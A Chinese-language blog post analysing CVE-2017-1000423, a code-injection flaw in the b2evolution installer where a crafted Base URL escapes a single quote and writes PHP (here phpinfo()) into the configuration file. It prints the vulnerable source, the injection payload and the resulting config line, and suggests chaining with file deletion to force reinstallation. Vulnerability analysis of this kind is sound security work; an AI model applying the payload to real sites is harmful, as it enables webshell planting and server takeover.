B2evolution安装过程过滤不严导致Getshell漏洞分析(CVE-2017-1000423)

0x00前言

好久没有更新博客了,看到b2evolution6.6.0 - 6.8.10被爆出安装过程过滤不严导致Getshell漏洞(CVE-2017-1000423),简单分析一下。

0x01复现环境搭建

1
2
3
git clone https://github.com/b2evolution/b2evolution.git
cd b2evolution
git checkout -b 6.8.10

0x02分析过程

1.请求http://localhost/b2evolution/install/index.php?action=start

2.输入Base URL的值如下(需要有效的数据库配置)

1
http://localhost/b2evolution/\\';phpinfo();//

3.处理过程跟进install/_functions_install.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#第1899行
array(
"\$db_config = array(\n"
."\t'user' => '".str_replace( array( "'", "\$" ), array( "\'", "\\$" ), $params['db_user'] )."',\$1"
."\t'password' => '".str_replace( array( "'", "\$" ), array( "\'", "\\$" ), $params['db_password'] )."',\$2"
."\t'name' => '".str_replace( array( "'", "\$" ), array( "\'", "\\$" ), $params['db_name'] )."',\$3"
."\t'host' => '".str_replace( array( "'", "\$" ), array( "\'", "\\$" ), $params['db_host'] )."',\$4",
"tableprefix = '".str_replace( "'", "\'", $params['db_tableprefix'] )."';",
"baseurl = '".str_replace( "'", "\'", $params['baseurl'] )."';",
"admin_email = '".str_replace( "'", "\'", $params['admin_email'] )."';",
'config_is_done = 1;',
), $conf );

// Write new contents:
if( save_to_file( $conf, $conf_filepath, 'w' ) )
{
display_install_messages( sprintf( T_('Your configuration file <code>%s</code> has been successfully created.').'</p>', $conf_filepath ), 'success' );

$tableprefix = $params['db_tableprefix'];
$baseurl = $params['baseurl'];
$admin_email = $params['admin_email'];
$config_is_done = 1;
if( ! $params['quick_install'] )
{ // Switch to menu only on standard installation:
$action = 'menu';
}
}

其中针对baseurl的处理如下,即替换单引号'\'

1
"baseurl = '".str_replace( "'", "\'", $params['baseurl'] )."';"

字符串baseurl处理后如下:

1
http://localhost/b2evolution/\\\';phpinfo();//

所以导致了单引号的逃逸,紧接着调用save_to_file存入/conf/_basic_config.php文件。

4.打开/conf/_basic_config.php文件内容如下:

1
$baseurl = 'http://localhost/b2evolution/\\';phpinfo();//';

5.shell地址:

1
http://localhost/b2evolution/

0x03小结

这个漏洞需要在重装的时候才能利用,可以结合任意文件删除漏洞利用。